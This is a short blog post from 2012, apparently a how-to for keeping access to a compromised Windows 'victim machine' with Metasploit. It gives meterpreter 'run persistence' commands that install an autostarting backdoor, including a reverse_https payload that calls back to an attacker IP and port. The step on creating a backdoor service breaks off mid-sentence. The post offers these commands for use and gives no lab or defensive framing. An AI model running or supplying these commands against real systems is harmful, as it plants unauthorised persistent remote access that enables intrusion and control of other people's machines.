Sunday, 8 January 2012
Howto: Run Persistence with Metasploit.
1. You can get into the victim machine with Metasploit.
2. Use the post module.
meterpreter> run persistence -U -i 5 -p attacker_port -r attacker_ip
3. If you want to change payload use -P option for that.
meterpreter> run persistence -P windows/meterpreter/reverse_https -U -p attacker_port -r attacker_ip
4. If you want to create the backdoor service in the victim machine,
Labels:
APT,
backdoor,
Crack,
exploitation,
Hacking,
hacking tool,
Information Security,
metasploit,
Network Security,
packet analysis,
pentest,
security,
shell,
Source,
tool,
trick
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment